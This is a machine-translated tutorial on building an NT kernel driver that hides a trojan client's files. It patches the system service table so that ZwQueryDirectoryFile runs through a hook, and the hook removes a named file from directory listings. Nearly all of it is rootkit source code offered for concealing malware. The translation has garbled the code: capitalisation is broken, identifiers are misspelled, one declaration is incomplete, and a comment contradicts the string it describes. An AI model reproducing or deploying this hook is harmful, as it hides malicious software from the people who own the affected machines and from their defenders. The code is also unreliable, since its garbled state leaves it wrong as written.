The API driver intercepts nt to hide the trojan Client

At present, there are many methods to hide files and directories in NT. The simplest one is to add system and hidden properties to files and folders so that the operating system will not be displayed, however, this method is not thorough and has no availability! Next we will introduce how to use the NT driver.ProgramTo intercept ntapi to completely hide files and directories. There is a file NTDLL. dll in NT. Most ntapis are encapsulated in this library. The zwquerydirectoryfile API is used to find Files And Directories. Therefore, you only need to intercept this API to completely hide the files and directories! Do not implement the following steps (preparation: Find a WDM Driver Model in ntddk, that is, the simplest driver ):

1. Define the structure No. 3rd of file_information_class: _ file_both_dir_information, which is a required parameter for zwquerydirectoryfile.

Typedef struct _ file_both_dir_information {
Ulong nextentryoffset;
Ulong fileindex;
Large_integer creationtime;
Large_integer lastaccesstime;
Large_integer lastwritetime;
Large_integer changetime;
Large_integer endoffile;
Large_integer allocationsize;
Ulong fileattributes;
Ulong filenamelength;
Ulong easize;
Cchar shortnamelength;
Wchar shortname [12];
Wchar filename [1];
} File_both_dir_information, * pfile_both_dir_information;

2. Declare zwquerydirectoryfile and then define the prototype of zwquerydirectoryfile:

Extern ntsysapi ntstatus ntapi zwquerydirectoryfile (
In handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );

// Define the prototype of zwquerydirectoryfile

Typedef ntstatus (* realzwquerydirectoryfile) (IN handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );

// Define an original function pointer
Realzwquerysysteminformation;

3. Define a prototype for replacing an API function:

Ntstatus hookzwquerydirectoryfile (
In handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );

4. Add the following statement to the DriverEntry function:

// Save the actual zwquerydirectoryfile function address

Realzwquerydirectoryfile = (realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile ));

// Point the custom replacement function pointer to the real zwquerydirectoryfile Function

(Realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile) = hookzwquerydirectoryfile;

5. Add restoration to the driverunload function.Code:

// Restore the original function pointer

(Realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile) = realzwquerydirectoryfile;

6. Now the preparation is complete, and all the function pointers have been set and switched. The rest is to implement the custom replacement function hookzwquerydirectoryfile. The Code is as follows:

Ntstatus hookzwquerydirectoryfile (
In handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery)
{
Ntstatus RC;
Ulong cr0value;

Ansi_string ansifilename, ansidirname, hidedirfile;
Unicode_string unifilename;

// The name of the file to be uploaded is debug.exe.
Rtlinitansistring (& hidedirfile, "dbgview. EXE ");

// Execute the real zwquerydirectoryfile Function
Rc = (realzwquerydirectoryfile ))(
Hfile,
Hevent,
Ioapcroutine,
Ioapccontext,
Piostatusblock,
Fileinformationbuffer,
Fileinformationbufferlength,
Fileinfoclass,
Breturnonlyoneentry,
Pathmask,
Brestartquery );
/* If the execution is successful (and the value of file_information_class is filebothdirectoryinformation, We will process and filter out */
If (nt_success (RC) & (fileinfoclass = filebothdirectoryinformation ))
{
Pfile_both_dir_information pfileinfo;
Pfile_both_dir_information plastfileinfo;
Bool blastone;
// Assign the execution result to pfileinfo
Pfileinfo = (pfile_both_dir_information) fileinformationbuffer;
Plastfileinfo = NULL;
// Cyclic check
Do
{
Blastone =! (Pfileinfo-> nextentryoffset );
Rtlinitunicodestring (& uniilename, pfileinfo-> filename );
Rtlunicodestringtoansistring (& ansifilename, & unifilename, true );
Rtlunicodestringtoansistring (& ansidirname, & unifilename, true );
Rtlupperstring (& ansifilename, & ansidirname );
// Print the result. Use debugview to view the printed result.
Dbuplint ("ansifilename: % s/n", ansifilename. buffer );
Dbuplint ("hidedirfile: % s/n", hidedirfile. buffer );

// Start the comparison. If the comparison is found, the file or directory will be hidden.
If (rtlcomparememory (ansifilename. buffer, hidedirfile. buffer, hidedirfile. Length) = hidedirfile. length)
{
Dbuplint ("this is hidedirfile! /N ");
If (blastone)
{
If (pfileinfo = (pfile_both_dir_information) fileinformationbuffer)
{
Rc = 0x80000006; // hide a file or directory;
}
Else
{
Plastfileinfo-> nextentryoffset = 0;
}
Break;
}
Else // move the pointer backward
{
Int IPOs = (ulong) pfileinfo)-(ulong) fileinformationbuffer;
Int ileft = (DWORD) fileinformationbufferlength-IPOs-pfileinfo-> nextentryoffset;
Rtlcopymemory (pvoid) pfileinfo, (pvoid) (char *) pfileinfo + pfileinfo-> nextentryoffset), (DWORD) ileft );
Continue;
}
}
Plastfileinfo = pfileinfo;
Pfileinfo = (pfile_both_dir_information) (char *) pfileinfo + pfileinfo-> nextentryoffset );

} While (! Blastone );
Rtlfreeansistring (& ansidirname );
Rtlfreeansistring (& ansifilename );
}
Return (RC );
}